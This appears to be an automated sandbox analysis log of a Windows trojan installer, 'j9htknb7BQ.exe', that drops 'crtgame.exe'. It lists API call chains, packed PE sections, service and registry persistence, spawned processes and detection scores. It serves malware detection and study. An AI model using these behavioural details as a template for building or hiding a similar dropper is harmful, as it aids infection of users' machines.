                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045678C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00477568 NtdllDefWindowProc_A,1_2_00477568
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00466ABC1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0047EFD81_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0046F68C1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0048C1101_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004301D01_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004442C41_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045E7EC1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045A8941_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004449BC1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00468B441_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00434B1C1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00430D5C1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00444DC81_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00484ED41_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045101C1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00443D1C1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00485E081_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00433E181_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_02301EE01_2_02301EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_023043041_2_02304304
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_023011401_2_02301140
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_023016B01_2_023016B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004010515_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_00401CBD5_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BC5F147_2_02BC5F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BCEA067_2_02BCEA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BE48E97_2_02BE48E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BE28747_2_02BE2874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDE0657_2_02BDE065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD99447_2_02BD9944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDA6FA7_2_02BDA6FA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BE4E607_2_02BE4E60
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD7F027_2_02BD7F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDD7597_2_02BDD759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDDC4D7_2_02BDDC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFB8067_2_02BFB806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFB85F7_2_02BFB85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFBE1D7_2_02BFBE1D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFBE577_2_02BFBE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02BD85A0 appears 37 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02BE4DF0 appears 137 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00456F08 appears 91 times
                  Source: j9htknb7BQ.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: j9htknb7BQ.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: j9htknb7BQ.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: j9htknb7BQ.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: j9htknb7BQ.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-0C5FH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-0C5FH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-0C5FH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-0C5FH.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: SpaceXRaces.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-I69V3.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-53LMN.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-NTP22.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-J4G02.tmp.1.drStatic PE information: Number of sections : 18 > 10
                  Source: is-6AF6U.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-4L1QL.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-NFQ3O.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: j9htknb7BQ.exe, 00000000.00000003.2046339269.0000000002138000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs j9htknb7BQ.exe
                  Source: j9htknb7BQ.exe, 00000000.00000003.2046177906.0000000002360000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs j9htknb7BQ.exe
                  Source: j9htknb7BQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SpaceXRaces.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-V4Q5G.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-L2U9S.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-PE6Q4.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-QRNOQ.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-RV1NR.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-7M8GD.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-LCCKT.tmp.1.drBinary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@15/128@1/2
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD02C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,7_2_02BD02C0
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455328
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00402548
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0046D118 GetVersion,CoCreateInstance,1_2_0046D118
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026F0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGameJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeMutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeFile created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmpJump to behavior
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: is-J4G02.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-J4G02.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-J4G02.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-J4G02.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-J4G02.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-J4G02.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-J4G02.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-J4G02.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-J4G02.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: j9htknb7BQ.exeReversingLabs: Detection: 39%
                  Source: j9htknb7BQ.exeVirustotal: Detection: 58%
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeFile read: C:\Users\user\Desktop\j9htknb7BQ.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\j9htknb7BQ.exe "C:\Users\user\Desktop\j9htknb7BQ.exe"
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp "C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp "C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /QueryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -iJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -sJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
